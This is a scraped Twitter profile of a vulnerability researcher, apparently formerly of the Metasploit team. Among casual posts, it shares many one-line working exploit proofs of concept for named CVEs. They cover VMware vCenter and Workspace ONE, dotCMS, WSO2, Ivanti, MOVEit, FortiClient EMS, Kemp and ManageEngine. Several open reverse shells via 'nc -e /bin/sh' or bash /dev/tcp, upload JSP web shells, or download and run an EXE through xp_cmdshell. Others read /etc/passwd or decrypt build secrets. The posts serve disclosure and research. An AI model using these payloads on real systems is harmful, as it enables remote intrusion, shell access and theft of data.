wvu @wvuuuuuuuuuuuuu Twitter profile

Pinned Tweet

wvu

@wvuuuuuuuuuuuuu

2 years

@wvu @infosec .exchange

5

1

22

Last Seen Profiles

@Revelator_Labs

@LottoCodes

@StwGendut

@nk54069

@MarcelBumX

@evtire

@zaawaaditv

@bad_immigrant

@8_k_d

@RussiaBattleMap

@StalkingVi96051

@stwmaniax

@suimineru

@chrsgrrtt

@SecretlyGroup

@p_seln

@saifullahawan40

@Picha_Bubble

@theo_2307

@Mohamedmod94400

@saraymnn

@TeamLagent

@bokeplokalmalam

@jaicemcguire85

@Ryo_kuwaki

@mh0ffman

@tsaqeelaa

@_be_logical_

@JonathanBearde2

@Andi51495194

@stw_pdg

@mrrrk_

@shima_f_momochi

@_WhoIsNickJones

@LystMusic

@sanyadesu

wvu

@wvuuuuuuuuuuuuu

5 months

26

80

892

wvu

@wvuuuuuuuuuuuuu

3 years

CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below. curl -kv " https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444"

wvu

@wvuuuuuuuuuuuuu

3 years

Redacted RCE PoC: 1. curl -kv " https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/$RANDOM" -H Content-Type: -d "" 2. curl -kv " https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../[redacted]" -H Content-Type: -d "[redacted]"

2

13

40

5

382

847

wvu

@wvuuuuuuuuuuuuu

2 years

Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'

9

195

578

wvu

@wvuuuuuuuuuuuuu

4 months

Ada Lündhé

@sc_codeUM

4 months

Stop. Writing. Bash scripts.

507

35

1K

5

36

460

wvu

@wvuuuuuuuuuuuuu

3 years

Don't bash open-source developers and maintainers, please. Bugs happen, and the software is free. Hate the bug, not the dev.

Volkan Yazıcı

@yazicivo

3 years

Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.

176

2K

10K

4

90

378

wvu

@wvuuuuuuuuuuuuu

4 months

Who remembers when Ubuntu was a brown Debian?

40

21

366

wvu

@wvuuuuuuuuuuuuu

2 years

CVE-2022-1388 is an unauthed RCE in F5 BIG-IP. Hat tip @n0x08 .

5

141

364

wvu

@wvuuuuuuuuuuuuu

2 years

PHP.

Snap Sec

@snap_sec

2 years

Can you spot a bug🐞 in this code👨‍💻? #appsec #infosec #cybersecurity

151

77

493

26

28

313

wvu

@wvuuuuuuuuuuuuu

2 years

This works against Docker: curl -kv https://127.0.0.1:8443/api/content/ -F "hax=@-;filename=../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://127.0.0.1:8443/x.jsp -d "c=touch /tmp/vulnerable"

shubs

@infosec_au

2 years

A few months ago, I collaborated with @HusseiN98D to find critical vulnerabilities in a bank. It involved finding a 0day in dotCMS. You can read about the discovery and exploitation process here:

10

181

591

7

76

286

wvu

@wvuuuuuuuuuuuuu

2 years

You find yourself inside an SSH tunnel. Around you is darkness. You fumble for your flashlight, but it is nowhere to be found.

23

31

261

wvu

@wvuuuuuuuuuuuuu

2 years

CVE-2022-29464 PoC for this in two commands... 1. msfvenom -p java/meterpreter/reverse_tcp -f war lhost=192.168.0.6 | curl -kv https://192.168.0.6:9443/fileupload/toolsAny -F ../../../../repository/deployment/server/webapps/x.war=@- 2. curl -kv https://192.168.0.6:9443/x :/

wvu

@wvuuuuuuuuuuuuu

2 years

On WSO2 CVE-2022-29464... you'll definitely want to check for deployed WAR files in addition to JSP. Confirmed a full Java Meterpreter shell for this.

2

5

36

7

77

248

wvu

@wvuuuuuuuuuuuuu

3 years

The workaround for Pulse Secure CVE-2021-22893 blocks the following URI patterns: ^/+dana/+meeting ^/+dana/+fb/+smb ^/+dana-cached/+fb/+smb ^/+dana-ws/+namedusers ^/+dana-ws/+metric So not much more than we already know, but at least these are the specific patterns, AFAICT.

2

113

243

wvu

@wvuuuuuuuuuuuuu

3 years

"The difference between a PoC and an exploit is one works on my box, and the other works on yours."

casey

@varcharr

3 years

the bad news is that someone hacked your computer the good news is that my exploit worked

2

14

131

3

45

237

wvu

@wvuuuuuuuuuuuuu

1 year

curl PoC for MOVEit CVE-2023-35708: time curl -kv https://192.168.56.103/machine.aspx -H "X-IPSGW-ClientCert: $(openssl req -x509 -noenc -keyout /dev/null -subj "/CN=';SELECT SLEEP(10);--" -outform DER | base64 -w 0)"

MCKSys Argentina

@MCKSysAr

1 year

As promised, here's a pic of the Poc for CVE-2023-35036 (Progress MOVEit Transfer). As soon as I can get RCE, I'll upload the final PoC to github. Any ideas/suggestions are welcomed!

9

44

146

9

86

239

wvu

@wvuuuuuuuuuuuuu

3 years

This is my last week at Rapid7. The past eight and a half years have been an incredible journey of growth and self-discovery, but it's time to move on and grow in new directions. Thank you to all the peers I've had here, in particular Metasploit and ETR. You know who you are!

29

7

225

wvu

@wvuuuuuuuuuuuuu

1 year

Ivanti Avalanche CVE-2023-32563: curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe

3

57

176

wvu

@wvuuuuuuuuuuuuu

3 years

[root @PA -VM ~]# cat /proc/sys/kernel/randomize_va_space 0 [root @PA -VM ~]#

19

13

171

wvu

@wvuuuuuuuuuuuuu

2 years

oh my god i'm a pentester now

22

2

159

wvu

@wvuuuuuuuuuuuuu

1 year

Analysis and PoC for Sophos Web Appliance CVE-2023-1671.

Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) - Blog - VulnCheck

CVE-2023-1671 is a pre-authenticated command injection in Sophos Web Appliance. In this blog post, VulnCheck researchers analyze the vulnerability and develop a proof of concept (PoC) for it.

vulncheck.com

5

63

158

wvu

@wvuuuuuuuuuuuuu

3 years

FYI for VMware vCenter Server CVE-2021-22005.

Add VMware vCenter Server CVE-2021-22005 exploit by wvu · Pull Request #15747 · rapid7/metasploit...

msf6 exploit(linux/http/vmware_vcenter_analytics_file_upload) > info Name: VMware vCenter Server Analytics (CEIP) Service File Upload Module: exploit/linux/http/vmware_vcenter_a...

github.com

2

60

148

wvu

@wvuuuuuuuuuuuuu

3 years

Metasploit module for VMware vCenter Server CVE-2021-21985, leveraging Ricter Z's SSRF-based RCE chain.

1

60

139

wvu

@wvuuuuuuuuuuuuu

1 year

Rapid7 layoff...

A Message from Rapid7 CEO, Corey Thomas | Rapid7 Blog

www.rapid7.com

11

56

137

wvu

@wvuuuuuuuuuuuuu

3 years

Notes and PoC for the pre-auth takeover of build pipelines in GoCD. curl -v " http://127.0.0.1:8153/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"

wvu-r7's assessment of Pre-Auth Takeover of Build Pipelines in GoCD (CVE-2021-43287) | AttackerKB

This assessment has moved to the Rapid7 analysis. Thank you

attackerkb.com

4

53

132

wvu

@wvuuuuuuuuuuuuu

3 years

CVE-2021-38647 RCE PoC using ExecuteScript (multi-line shell script execution): curl -v http://127.0.0.1:5985/wsman -H "Content-Type: application/soap+xml" -d <XML payload>

wvu-r7's assessment of CVE-2021-38647 | AttackerKB

RCE PoC using ExecuteScript (multi-line shell script execution): `` wvu@kharak:/Downloads$ ` payload.xml: `xml

attackerkb.com

wvu

@wvuuuuuuuuuuuuu

3 years

I just reproduced CVE-2021-38647 (unauthed root RCE in the OMI agent) using the details in the technical blog post. <p:StdOut>uid=0(root) gid=0(root) groups=0(root)& #10 ;</p:StdOut> 🤯

2

28

103

1

52

131

wvu

@wvuuuuuuuuuuuuu

6 years

Slides from my talk with @egyp7 plus more examples: .

3

58

129

wvu

@wvuuuuuuuuuuuuu

3 years

I am happy to say that I'll be starting at @Atredis next week. :)

wvu

@wvuuuuuuuuuuuuu

3 years

I do have something lined up that I'm excited about, but that news will have to wait! :-)

5

0

25

26

5

126

wvu

@wvuuuuuuuuuuuuu

1 year

CVE-2023-38035: curl -kv https://RHOST:8443/mics/services/MICSLogService -H "Content-Type: application/x-hessian" --data-binary @<(printf "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00\x30sudo bash -c bash&>/dev/tcp/192.168.56.1/4444<&1S\x00\x06isRootTzNz")

5

39

123

wvu

@wvuuuuuuuuuuuuu

1 year

1

27

126

wvu

@wvuuuuuuuuuuuuu

10 months

Confirmed auth bypass!

SECUINFRA FALCON TEAM

@SI_FalconTeam

10 months

🚨 #Cisco #IOSXE #CVE -2023-20198 #CVE -2023-20273 Patience is a virtue 🙂 We can confirm: New activity from IP 192.3.101[.]111 today. Our HPs 🍯 show exploit attempts on clean appl. + Implant usage e.g. "show ver" for recon. Happy to share PCAPs, TLP:💛 ➡️ DM. cc @ET_Labs

14

44

213

2

31

110

wvu

@wvuuuuuuuuuuuuu

3 years

Uploaded a few of my notes and PoCs from investigating CVE-2021-22986 (F5 iControl REST) this past week.

wvu-r7's assessment of K03009991: iControl REST unauthenticated remote command execution vulnerab...

This writeup has been updated to thoroughly reflect my findings and that of the community's. Thank you! This vulnerability appears to involve some kind of auth…

attackerkb.com

3

40

110

wvu

@wvuuuuuuuuuuuuu

3 years

I will never not like/retweet threads about command-line tips and tricks, no matter how simple or complex they are. Sharing is caring, and it's a refreshing attitude to see.

5

108

wvu

@wvuuuuuuuuuuuuu

3 years

Previously unauthed AMF deserialization in VMware vCenter Server? Maybe.

wvu-r7's assessment of CVE-2021-21980 | AttackerKB

This is not CVE-2021-21980 or CVE-2021-22049 but rather a curious case of AMF deserialization that was patched against auth bypass in the same update. My notes…

attackerkb.com

4

35

104

wvu

@wvuuuuuuuuuuuuu

3 years

I just reproduced CVE-2021-38647 (unauthed root RCE in the OMI agent) using the details in the technical blog post. <p:StdOut>uid=0(root) gid=0(root) groups=0(root)& #10 ;</p:StdOut> 🤯

Nir Ohfeld

@nirohfeld

3 years

Microsoft just patched 4 vulnerabilities we ( @wiz_io ) recently reported, including a CVSS 9.8 RCE. These vulnerabilities affect countless machines as the OMI agent is silently installed when enabling many Azure services. #PatchTuesday

5

129

276

2

28

103

wvu

@wvuuuuuuuuuuuuu

2 years

Looking at the patch for Atlassian Confluence CVE-2022-26134 on my lunch break... - final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack); - final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack); 👀

5

30

101

wvu

@wvuuuuuuuuuuuuu

3 years

The Metasploit module for ProxyShell has landed in the tree. Many thanks to @zeroSteiner for the development effort. Module: Documentation:

Caitlin Condon

@catc0n

3 years

ProxyShell exploit chain analysis in AttackerKB c/o @zeroSteiner and @wvuuuuuuuuuuuuu . Exploit should be coming to a Metasploit Framework fork near you soon.🐚 Props as always to @orange_8361 on the great research!

4

23

63

1

50

96

wvu

@wvuuuuuuuuuuuuu

3 years

Note that attackers can control most of the request, too, including sending a POST instead of a GET. curl -v " http://127.0.0.1/?unix:$(perl -e 'print "A"x4096')| http://172.16.57.1:8080/" -d foo=bar

Rapid7

@rapid7

3 years

In September, Apache released a fix for CVE-2021-40438, a critical SSRF #vulnerability . Several sources now confirm they've seen exploit attempts in the wild – learn more and find mitigation guidance:

1

13

17

3

25

99

wvu

@wvuuuuuuuuuuuuu

3 years

Metasploit module for Atlassian Confluence CVE-2021-26084, as promised. See module doc for updated IOCs.

Add Atlassian Confluence CVE-2021-26084 exploit by wvu · Pull Request #15645 · rapid7/metasploit-...

msf6 exploit(linux/http/atlassian_confluence_webwork_ognl_injection) > info Name: Atlassian Confluence WebWork OGNL Injection Module: exploit/linux/http/atlassian_confluence_web...

github.com

2

32

99

wvu

@wvuuuuuuuuuuuuu

3 years

Metasploit module for ManageEngine ADSelfService Plus CVE-2021-40539.

Add ManageEngine ADSelfService Plus CVE-2021-40539 exploit by wvu · Pull Request #15874 · rapid7/...

msf6 exploit(windows/http/manageengine_adselfservice_plus_cve_2021_40539) > info Name: ManageEngine ADSelfService Plus CVE-2021-40539 Module: exploit/windows/http/manageengine_a...

github.com

1

33

96

wvu

@wvuuuuuuuuuuuuu

3 years

Updated with further patch analysis and PoC/IOCs. curl -kv https://[redacted]/ui/h5-vsan/rest/proxy/service/CLASS/METHOD -H "Content-Type: application/json" -d {} VMware vCenter Server CVE-2021-21985?

wvu

@wvuuuuuuuuuuuuu

3 years

A familiar pattern is revealed in VMware vCenter Server CVE-2021-21985/CVE-2021-21986... + <filter-mapping> + <filter-name>authenticationFilter</filter-name> + <url-pattern>/rest/*</url-pattern> + </filter-mapping>

1

10

24

3

33

93

wvu

@wvuuuuuuuuuuuuu

3 years

My notes on Atlassian Confluence CVE-2021-26084 are posted here. A vuln check, RCE PoC, and log IOCs are included. Many thanks to @catc0n for writing words.

CVE-2021-30632 | AttackerKB

Threat status: Widespread threat Attacker utility: Remote code execution Vulnerability class: Injection Update October 4, 2021: Sophos is sharing details about…

attackerkb.com

3

39

92

wvu

@wvuuuuuuuuuuuuu

2 years

Metasploit module for VMware Workspace ONE Access CVE-2022-22954, as promised.

Add VMware Workspace ONE Access CVE-2022-22954 by wvu · Pull Request #16512 · rapid7/metasploit-f...

msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > info Name: VMware Workspace ONE Access CVE-2022-22954 Module: exploit/linux/http/vmware_workspace_one_acces...

github.com

1

25

89

wvu

@wvuuuuuuuuuuuuu

5 months

RCE: echo -ne "MSG_HEADER: FCTUID=';EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'CURL -O 192.168.56.1/X.EXE&X.EXE&DEL X.EXE';--\nX-FCCK-REGISTER:\r\n" | ncat --ssl 192.168.56.101 8013

Horizon3 Attack Team

@Horizon3Attack

6 months

Our deep-dive for the recent #Fortinet #FortiClient EMS SQL injection vulnerability, CVE-2023-48788, that leads to RCE as SYSTEM.

8

103

239

1

28

85

wvu

@wvuuuuuuuuuuuuu

3 years

Confirmed. Unfortunately.

hackerfantastic.x

@hackerfantastic

3 years

Here's how to run full commands with arguments via CVE-2021-41773 via a path traversal vulnerability in the event mod-cgi is enabled on Apache 2.4.49 curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" ' http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv Patch urgently.

14

523

1K

3

11

86

wvu

@wvuuuuuuuuuuuuu

2 years

If you're auditing code or trying to write a PoC, look at the unit tests...

4

9

84

wvu

@wvuuuuuuuuuuuuu

3 years

I just want to hack things with cool people.

7

3

78

wvu

@wvuuuuuuuuuuuuu

3 years

Technical details on ManageEngine ADSelfService Plus CVE-2021-40539. curl -v --path-as-is http://172.16.57.9:8888/./RestAPI/LogonCustomization -d methodToCall=previewMobLogo Will update as I gather more details.

CVE-2021-40539 | AttackerKB

On September 7, 2021, Zoho published a security advisory and software update for CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine…

attackerkb.com

6

22

77

wvu

@wvuuuuuuuuuuuuu

3 months

PSA: curl can do variables. Example using Nexus CVE-2024-4956: curl -v --variable hax=////../../../../etc/passwd --expand-url http://127.0.0.2:8081/{{hax:url}}

1

17

76

wvu

@wvuuuuuuuuuuuuu

3 years

Analysis and PoC for ManageEngine Desktop Central CVE-2021-44515. STATE_COOKIE=&_REQS/_TIME/123

CVE-2021-44515 | AttackerKB

On December 3, 2021, Zoho published a vulnerability notification for CVE-2021-44515, an authentication bypass and potential remote code execution (RCE) vulnera…

attackerkb.com

2

24

74

wvu

@wvuuuuuuuuuuuuu

5 months

Progress Kemp Flowmon CVE-2024-2389: curl -kv ' https://192.168.56.12/service.pdfs/confluence?lang=en&file=`nc+-e+/bin/sh+192.168.56.1+4444`'

2

13

72

wvu

@wvuuuuuuuuuuuuu

2 years

@Andrew___Morris btw i use arch

1

0

70

wvu

@wvuuuuuuuuuuuuu

3 years

Full details on the CVE-2021-40539 exploit chain.

Synacktiv

@Synacktiv

3 years

Takeover an entire domain by resetting passwords! We detailed how to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus in this blogpost @acervoise - @tiyeuse

0

60

148

3

14

69

wvu

@wvuuuuuuuuuuuuu

1 year

We need an IRC channel with all the vuln researchers in it.

8

9

68

wvu

@wvuuuuuuuuuuuuu

2 years

Confirmed working. wvu @hiigara :~/Downloads$ python3 -t 192.168.1.12 -c id uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0 wvu @hiigara :~/Downloads$

Horizon3 Attack Team

@Horizon3Attack

2 years

Last Friday we passed our POC to @GreyNoiseIO to build early detections. With reports of exploitation and multiple POCs now public here ours is. Advise to apply mitigations or patch immediately. #f5 #CyberSecurity

2

46

128

2

11

64

wvu

@wvuuuuuuuuuuuuu

2 years

Anyone analyzing this? :)

PT SWARM

@ptswarm

2 years

🔥 Veeam fixed an Unauth RCE (CVE-2022-26500, CVE-2022-26501) in Veeam Backup & Replication and a Local Privilege Escalation (CVE-2022-26503) in Veeam Agent for Microsoft Windows found by our researcher @ultrayoba . Advisory:

7

184

443

5

13

63

wvu

@wvuuuuuuuuuuuuu

2 years

Map Metasploit modules to CVEs...

wvu

@wvuuuuuuuuuuuuu

2 years

@iagox86 @ldsopreload @zeroSteiner @metasploit I'm neither, but FWIW, this works for me: jq '.[]|{fullname,cve:.references[]|select(startswith("CVE-"))}' ~/.msf4/store/modules_metadata.json

1

3

20

1

17

65

wvu

@wvuuuuuuuuuuuuu

3 years

Nothing special, but here are a couple MobileIron management shell escapes if you need 'em: install rpm url http://127.0.0.1/;sh install rpm info detail -E%{lua:rpm.interactive()}

3

18

64

wvu

@wvuuuuuuuuuuuuu

3 years

Retweeting this, since not too many people know about it. It's useful for debugging exploits, converting a module back into a PoC, and for building detections.

4

24

63

wvu

@wvuuuuuuuuuuuuu

3 years

Technical details on VMware vCenter Server CVE-2021-22005, including steps up to (but not including) RCE.

Derek Abdine

@dabdine

3 years

Full technical & internet-facing impact analysis of CVE-2021-22005. Kudos to @wvuuuuuuuuuuuuu . Always fun hunting together!

2

75

155

1

23

62

wvu

@wvuuuuuuuuuuuuu

6 months

CVE-2024-1212 reverse root shell: curl -kv " https://192.168.56.4/access/set?param=enableapi&value=1" -u "';ssh -oProxyCommand=';sh&>/dev/tcp/192.168.56.1/4444<&1' #:"

VulnCheck - Outpace Adversaries

Vulnerability intelligence that predicts avenues of attack with speed and accuracy.

vulncheck.com

Rhino Security Labs

@RhinoSecurity

6 months

New Blog Post: CVE-2024-1212: Unauthenticated Command Injection In Progress Kemp LoadMaster

2

22

67

1

24

61

wvu

@wvuuuuuuuuuuuuu

3 years

@testanull @di_v_erge

ᵃᵈᵃᵐ

@twokilohertz

3 years

@ccosppie @pierrebertin123 also, this screenshot sort of speaks for itself.

3

40

221

1

62

wvu

@wvuuuuuuuuuuuuu

3 years

Notes and PoC for ManageEngine ADManager Plus CVE-2021-37928, a post-auth file upload with default creds. curl -vb JSESSIONIDADSMSSO=<val> http://172.16.57.222:8080/RestAPI/WC/NotificationTemplate/attachFiles -F "UPLOADED_FILE=@-;filename=foo.txt" <<<bar

wvu-r7's assessment of CVE-2021-37928 | AttackerKB

The affected endpoint is /RestAPI/WC/NotificationTemplate/attachFiles with parameter UPLOADEDFILE. The vulnerability can be exploited as the SYSTEM user if the…

attackerkb.com

3

13

62

wvu

@wvuuuuuuuuuuuuu

3 years

I must not procrastinate. Procrastination is the time-killer. Procrastination is the little-death that brings total distraction.

8

6

61

wvu

@wvuuuuuuuuuuuuu

3 years

Last day. Here we go! :')

wvu

@wvuuuuuuuuuuuuu

3 years

This is my last week at Rapid7. The past eight and a half years have been an incredible journey of growth and self-discovery, but it's time to move on and grow in new directions. Thank you to all the peers I've had here, in particular Metasploit and ETR. You know who you are!

29

7

225

8

1

62

wvu

@wvuuuuuuuuuuuuu

5 months

If you thought the D-Link "backdoor" (CVE-2024-3272, CVE-2024-3273) was new, please see this writeup from 2018.

D-Link DNS-320 ShareCenter < 1.06 - Backdoor Access

www.exploit-db.com

5

18

59

wvu

@wvuuuuuuuuuuuuu

2 years

There is an RCE PoC for CVE-2022-26134 in this blog post. I haven't tested it yet.

Caitlin Condon

@catc0n

2 years

The Rapid7 team has a root cause analysis of Confluence CVE-2022-26134 out now with thanks to @Junior_Baines . This is an emergency mitigation situation.

2

106

188

3

20

59

wvu

@wvuuuuuuuuuuuuu

2 years

. @steventseeley You again!!

1

4

58

wvu

@wvuuuuuuuuuuuuu

2 years

Confirmed exploitability of this last night.

heige

@80vul

2 years

Apache CouchDB EPMD port:4369/TCP in ZoomEye About 81,154 results (Nearly year: 81,154 results) Of course, there has been an RCE vulnerability caused by default cookies in this protocol recently (CVE-2022-24706)

2

36

112

2

20

56

wvu

@wvuuuuuuuuuuuuu

5 months

Re CVE-2024-3400, please don't lock your detections to endpoint. I'm able to trigger the file write against /.

6

10

54

wvu

@wvuuuuuuuuuuuuu

5 months

Nothing better than root access to an appliance over SSH.

5

4

52

wvu

@wvuuuuuuuuuuuuu

5 months

We have confirmed the D-Link backdoor statically and reproduced its behavior in QEMU.

BleepingComputer

@BleepinComputer

5 months

Critical RCE bug in 92,000 D-Link NAS devices now exploited in attacks - @serghei

1

53

96

3

12

54

wvu

@wvuuuuuuuuuuuuu

3 years

WIP exploit for NetMotion Mobility CVE-2021-26914, pre-auth RCE in a mobile VPN server. Many thanks to @steventseeley for the vuln and support. 🔥

Add NetMotion Mobility CVE-2021-26914 exploit by wvu · Pull Request #15186 · rapid7/metasploit-fr...

msf6 exploit(windows/http/netmotion_mobility_mvcutil_deserialization) > info Name: NetMotion Mobility Server MvcUtil Java Deserialization Module: exploit/windows/http/netmotion_...

github.com

3

15

54

wvu

@wvuuuuuuuuuuuuu

3 years

Got RCE. Woohoo! Many thanks to @testanull et al.

Rahul Maini

@iamnoooob

3 years

Just did Atlassian Confluence UnAuth RCE CVE-2021-26084 along with @rootxharsh . It was relatively simpler than expected :D

14

108

600

2

6

53

wvu

@wvuuuuuuuuuuuuu

3 years

Rapid7 analysis for CVE-2021-44077. PoC inside.

CVE-2021-44077 | AttackerKB

On September 16, 2021, Zoho released a Security Advisory urging customers to upgrade their software in order to resolve an authentication bypass vulnerability.…

attackerkb.com

4

32

49

wvu

@wvuuuuuuuuuuuuu

3 years

Open source is fun. (:

4

5

51

wvu

@wvuuuuuuuuuuuuu

3 years

Minimized PoC: curl -kv https://172.16.57.254:4444/var -H "Content-Type: application/json; charset=UTF-8" -d '{"SID":"|touch /tmp/vulnerable|"}' Thanks for all the hacks, @jstnkndy . 👍

Atredis Partners

@Atredis

3 years

When you come across an Unauth RCE CVE with no public details, what do you do? Justin Kennedy ( @jstnkndy ) shares his adventure, both failures and successes, in uncovering the mysteries of CVE-2020-25223 in this writeup:

8

77

172

2

22

52

wvu

@wvuuuuuuuuuuuuu

3 years

Writeup has been updated with full details, including IOCs for defenders. The SSRF vector is still developing. I'll upload more code in a bit. 😩

wvu

@wvuuuuuuuuuuuuu

3 years

Uploaded a few of my notes and PoCs from investigating CVE-2021-22986 (F5 iControl REST) this past week.

3

40

110

2

25

51

wvu

@wvuuuuuuuuuuuuu

3 years

Confirmed RCE with an RMI server. Great work. I'll thread all the MethodInvoker-based classes you can use.

Vcenter Server CVE-2021-21985 RCE PAYLOAD

废话不多讲，老外对补丁的分析，具体补丁的分析和漏洞点可以看这篇文章 https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985 这个漏洞主要是对Spring 管理的bean进行相关的方法对象操作，但是这里不同的是，操作的bean在内存中基本上都是一个对象，这样就可以通过多次方法调用来实现伪链式调用。 Vcenter 开启Debug端口，可以直

iswin.org

2

15

49

wvu

@wvuuuuuuuuuuuuu

2 years

I hear you get one white hair for every PoC or exploit you've written.

7

48

wvu

@wvuuuuuuuuuuuuu

6 months

Endpoints: /services/messagebroker/amf /services/messagebroker/nonsecureamf /services/messagebroker/nonsecurestreamingamf /services/messagebroker/streamingamf

CVE

@CVEnew

6 months

CVE-2024-0692 The SolarWinds Security Event Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an unauthenticated user to abuse SolarWinds’ ser…

3

34

68

1

10

49

wvu

@wvuuuuuuuuuuuuu

3 years

The full RCE chain for CVE-2021-21975 + CVE-2021-21983 might just fit in a tweet... FYI, I first tested 8.3.0, which is vulnerable to the SSRF but didn't seem exploitable for creds. YMMV, but I wasted time on it, lol. Great find, Egor and PT!

PT SWARM

@ptswarm

3 years

VMware fixed CVE-2021-21975 and CVE-2021-21983, which when chained together lead to an unauth RCE in vRealize Operations. The vulnerabilities were found by our researcher Egor Dimitrenko. Advisory:

3

98

244

0

12

49

wvu

@wvuuuuuuuuuuuuu

3 years

First win and first fail today. On my way to being a real pentester!

4

2

48

wvu

@wvuuuuuuuuuuuuu

4 years

Ever find yourself forgetting to change RPORT to 443 when you set the SSL option in Metasploit? Now you'll be reminded!

2

7

46

wvu

@wvuuuuuuuuuuuuu

3 years

This also works with POST request. curl -v " http://127.0.0.1:7080/openam/oauth2/..;/ccversion/Version" -d jato.pageSession=<serialized_object>

PortSwigger Research

@PortSwiggerRes

3 years

Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464) by @artsploit #exploit #bugbounty

15

174

365

2

16

47

wvu

@wvuuuuuuuuuuuuu

3 years

Metasploit module for ManageEngine ServiceDesk Plus CVE-2021-44077.

Add ManageEngine ServiceDesk Plus CVE-2021-44077 exploit by wvu · Pull Request #15950 · rapid7/me...

msf6 exploit(windows/http/manageengine_servicedesk_plus_cve_2021_44077) > info Name: ManageEngine ServiceDesk Plus CVE-2021-44077 Module: exploit/windows/http/manageengine_servi...

github.com

2

13

46

wvu

@wvuuuuuuuuuuuuu

10 months

Vuln analysis is just real-world CTF.

1

4

44

wvu

@wvuuuuuuuuuuuuu

5 months

everyone talks about return to work, but what about return to irc?

4

45

wvu

@wvuuuuuuuuuuuuu

1 year

what if attackers had code names for defenders

7

5

43

wvu

@wvuuuuuuuuuuuuu

3 years

Updated with information on decrypting build secrets (environment variables) after exploiting GoCD CVE-2021-43287. openssl aes-128-cbc -d -a -K 8db66fa5892e8bba1931fdbc7999034d -iv $(xxd -p <(base64 -d <<<S1+AMT0qR1Tc1e/0pszILQ==)) <<<CcOFLa59jShholBS0pV+yg==

wvu

@wvuuuuuuuuuuuuu

3 years

Notes and PoC for the pre-auth takeover of build pipelines in GoCD. curl -v " http://127.0.0.1:8153/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"

4

53

132

1

6

44

wvu

@wvuuuuuuuuuuuuu

2 years

I'm amazed this Metasploit module still works (i.e., it isn't broken).

1

7

43

wvu

@wvuuuuuuuuuuuuu

11 months

Phew, we got an IOS XE bind shell working.

4

1

43

wvu

@wvuuuuuuuuuuuuu

3 years

PoC for CVE-2021-44077 fits in one line/tweet.

wvu

@wvuuuuuuuuuuuuu

3 years

PoC: ./msfvenom -p windows/x64/shell_reverse_tcp -f exe lhost=172.16.57.1 | curl -v http://172.16.57.210:8080/RestAPI/ImportTechnicians -F step=hax -F "theFile=@-;filename=msiexec.exe" -: -m 3.5 http://172.16.57.210:8080/RestAPI/s247action -d execute=s247AgentInstallationProcess

2

10

26

0

25

43

wvu

@wvuuuuuuuuuuuuu

4 years

(WIP) VMware vCenter Server CVE-2021-21972 exploit dropping today in @metasploit . Please patch. This is a critical vuln, and exploits are readily available.

Add VMware vCenter Server CVE-2021-21972 exploit by wvu · Pull Request #14809 · rapid7/metasploit...

If you must use a raw link, use this one. It's linked to the branch, not a specific commit, so you'll get updates if you refresh. msf6 exploit(multi/http/vmware_vcenter_uploadova_rc...

github.com

1

24

44

wvu

@wvuuuuuuuuuuuuu

3 months

this is the web they stole from us

cts 🌸🏳️‍⚧️

@gf_256

3 months

so umm... yea lets just say ... github has a css injection 😳

61

275

4K

2

6

43

wvu

@wvuuuuuuuuuuuuu

3 years

FYI for Atlassian Confluence CVE-2021-26084.

Add Windows support to Atlassian Confluence CVE-2021-26084 exploit by wvu · Pull Request #15769 ·...

To-do Add automatic fingerprinting/targeting of platform java.lang.System.getProperty("os.name") via OGNL sandbox escape msf6 exploit(multi/http/atlassian_confluence_webwork...

github.com

1

9

43

wvu

@wvuuuuuuuuuuuuu

8 months

oh, you love command injections? name every command

16

1

42

wvu

@wvuuuuuuuuuuuuu

2 years

Great chain. A fine example of using XXE to upload a file, too!

Horizon3 Attack Team

@Horizon3Attack

2 years

Check out a recent finding by one of our own, Naveen Sunkavally. CVE-2022-28219 is an unauth RCE for ManageEngine ADAudit Plus. This XXE -> Deserialization chain often leads to host compromise as well as priv'd AD creds. Check out the blog post and POC:

6

258

707

3

5

43

wvu

@wvuuuuuuuuuuuuu

3 years

How to escape infosec Twitter?

20

0

41

wvu

@wvuuuuuuuuuuuuu

3 years

Analysis, PoCs, and IOCs for Cisco HyperFlex HX Data Platform CVE-2021-1497/CVE-2021-1498 and CVE-2021-1499. Another great find from @ptswarm . curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'

wvu-r7's assessment of CVE-2021-1499 | AttackerKB

